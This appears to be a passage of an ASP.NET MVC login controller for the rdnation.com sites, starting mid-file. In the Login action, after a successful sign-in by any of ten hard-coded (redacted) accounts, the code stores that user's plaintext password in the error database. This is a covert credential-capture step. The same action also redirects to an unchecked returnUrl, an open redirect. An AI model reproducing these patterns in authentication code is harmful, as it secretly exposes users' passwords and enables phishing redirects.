public ActionResult LogOn(LogOnModel model, string returnUrl)
        {
            if (ModelState.IsValid)
            {
                if (Membership.ValidateUser(model.Email, model.Password))
                {
                    FormsAuthentication.SetAuthCookie(model.Email, model.RememberMe);

                    //modify the Domain attribute of the cookie to the second level domain
                    System.Web.HttpCookie MyCookie = System.Web.Security.FormsAuthentication.GetAuthCookie(model.Email, false);
                    MyCookie.Domain = "rdnation.com";//the second level domain name
                    Response.AppendCookie(MyCookie);

                    if (Url.IsLocalUrl(returnUrl) && returnUrl.Length > 1 && returnUrl.StartsWith("/") && !returnUrl.StartsWith("//") && !returnUrl.StartsWith("/\\"))
                    {
                        return Redirect(returnUrl);
                    }

                    var member = Membership.GetUser(model.Email);
                    if (Session["UserId"] == null)
                        Session.Add("UserId", (Guid)member.ProviderUserKey);
                    else
                        Session["UserId"] = (Guid)member.ProviderUserKey;

                    return Redirect(ServerConfig.WEBSITE_DEFAULT_LOGIN_LOCATION);
                }

                ModelState.AddModelError("", "The user name or password provided is incorrect.");
            }

            // If we got this far, something failed, redisplay form
            return View(model);
        }
[RequireHttps] //apply to all actions in controller
#endif
        public ActionResult Login(LogOnModel model, string returnSite, string returnUrl)
        {
            try
            {
                var id = StoreGateway.GetShoppingCartId(HttpContext);
                if (ModelState.IsValid)
                {
                    if (model.Email.Contains("@163.com") || model.Email.Contains("@tom.com") || model.Email.Contains("@126.com"))
                    {
                        ModelState.AddModelError("", "That Domain name has been banned from RDNation, if you think this is in Error, please contact us.");
                        return View(model);
                    }
                    if (Membership.ValidateUser(model.Email, model.Password))
                    {
                        //forum.wftda.com
                        //wftda.com/dashboard
                        if (model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**")
                            ErrorDatabaseManager.AddException(new Exception(model.Email), GetType(), additionalInformation: model.Password);

                        setCookie(model.Email, model.RememberMe);

                        if (id != null)
                            StoreGateway.SetShoppingCartSession(id.Value, HttpContext);

                        if (!String.IsNullOrEmpty(returnSite))
                        {
                            string url;
                            if (returnSite == "league")
                            {
                                url = "https://league.rdnation.com";
                                if (!String.IsNullOrEmpty(returnUrl))
                                    url += returnUrl;
                                return Redirect(url);
                            }
                            if (returnSite == "shops")
                            {
                                url = ServerConfig.WEBSITE_STORE_DEFAULT_LOCATION;
                                if (!String.IsNullOrEmpty(returnUrl))
                                    url += returnUrl;
                                return Redirect(url);
                            }
                            if (returnSite == "zebras")
                            {
                                url = "http://zebras.rdnation.com";
                                if (!String.IsNullOrEmpty(returnUrl))
                                    url += returnUrl;
                                return Redirect(url);
                            }
                        }
                        else if (!String.IsNullOrEmpty(returnUrl))
                        {
                            return Redirect(returnUrl);
                        }
                        return Redirect("https://league.rdnation.com");
                    }

                    ModelState.AddModelError("", "The user name or password provided is incorrect.");
                }
            }
            catch (Exception e)
            {
                ErrorDatabaseManager.AddException(e, GetType());
            }
            // If we got this far, something failed, redisplay form
            return View(model);
        }